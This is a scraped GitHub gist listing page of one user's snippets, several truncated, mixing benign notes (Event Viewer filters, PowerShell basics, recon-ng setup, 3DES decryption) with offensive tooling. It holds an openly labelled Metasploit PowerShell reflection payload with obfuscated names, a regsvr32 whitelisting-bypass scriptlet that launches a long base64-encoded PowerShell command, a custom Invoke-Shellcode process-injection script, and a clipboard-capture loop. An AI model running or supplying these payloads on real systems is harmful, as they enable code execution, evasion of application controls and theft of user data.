Skip to content

Instantly share code, notes, and snippets.

View macostag's full-sized avatar
🏠
Working from home

Mario macostag

🏠
Working from home
View GitHub Profile
@macostag
macostag / capture-clip.py
Created May 7, 2018 00:23
Clipboard text capture
import pyperclip
import time
while True:
if pyperclip.paste() != 'None':
print pyperclip.paste()
time.sleep(2)
@macostag
macostag / event.xml
Created April 30, 2018 04:35
XML filtering in the Windows Event Viewer
<QueryList>
<Query Id="1">
<Select Path="Security">
*[EventData[Data[@Name='param1'] and (Data='mssecsvc')]]
</Select>
</Query>
</QueryList>
@macostag
macostag / pr.ps1
Last active September 4, 2025 09:00
Metasploit Powershell Reflection Payload
function q3 {
Param ($g7mWY, $y0ZK)
$mvajw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $mvajw.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mvajw.GetMethod('GetModuleHandle')).Invoke($null, @($g7mWY)))), $y0ZK))
}
function tma3R {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $v7E9,
@macostag
macostag / poc.sct
Last active April 16, 2018 03:29
POC Application whitelisting bypass regsvr32.exe
<?XML version="1.0"?><scriptlet><registration progid="Notes" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script><![CDATA[ var da = new ActiveXObject("WScript.Shell").Run("powershell -ENC SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABZADUATgBUADgASgBBAEUASQBiAHYASgB2ADQASABEAGkAVABBAHcAYQAzAGwAbwBFAG0AYgBuAGkAbwB4AEgAagBSAEUARQBpAEUAaABIAHEAYgBiAHQAegBDADQANwBzAEwAdQAxAEUAbwBNAC8ANQAyAHQASABEAFMAWgB3ACsAUwBaADkAMgBQAFcAaQAyAE0AUQBmAEsAbwBYAGkARgByAEEAZgA3AEgARwAzAEwARwBWAFoANwBLADAAZwBYAC8AUABzAHAANwBDAGwALwBEAEMARABXAHMAUwB2AEoASABoAG0AbwBTAGQATABjAG0AWQBpAHYAUgBIADgAVABNAFUAMwArAEsAVQBEAHcAKwBGAFIAWABmAGoAcQBoADIAMABEAEcAegBNADcARgBCAHAAdwA3AEE
# Start postgresql services
> service postgresql start
# Initialize the database
> msfdb init
# Delete and reinitialize the database
> msfdb reinit
# Delete database and stop using it
@macostag
macostag / iex-s.ps1
Last active March 11, 2018 17:29
Custom Invoke-Shellcode script
function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@macostag
macostag / powershell-enum.ps1
Last active March 10, 2018 19:16
Windows powershell enumeration cmdlets
#Local enumeration
#------------------------------
#Bios information
Get-WmiObject -Class Win32_Bios
#CPU info
Get-WmiObject -Class Win32_Processor
#Computer model info
Get-WmiObject -Class Win32_ComputerSystem
@macostag
macostag / powershell-basics.ps1
Last active May 12, 2024 04:39
Windows powershell basics notes
#Powershell basics:
#Displays help information.
Get-Help *event*
Get-Help Get-EventLog
Get-Help Get-EventLog -Online
#Update help.
Update-Help
#Gets all commands that are installed on the computer, including cmdlets, aliases, functions, workflows, filters, scripts, and applications.
@macostag
macostag / auto.rc
Last active February 8, 2020 23:09
Recon-ng v5 resource file
workspaces create "WORKSPACE NAME"
marketplace install recon/companies-contacts/pen
marketplace install recon/companies-domains/pen
marketplace install recon/companies-multi/shodan_org
marketplace install recon/companies-multi/whois_miner
marketplace install recon/companies-domains/viewdns_reverse_whois
marketplace install recon/companies-multi/github_miner
marketplace install recon/domains-hosts/brute_hosts
marketplace install recon/domains-hosts/bing_domain_web
@macostag
macostag / Decrypt3DES.py
Created January 20, 2018 22:49
Decrypt hex strings using 3DES (ECB mode).
import binascii
import random
import hashlib
import base64
from pyDes import *
def decrypt3DES(skey,sdata):
key = binascii.unhexlify(skey)
data = binascii.unhexlify(sdata)
key3DES = triple_des(key, ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_NORMAL)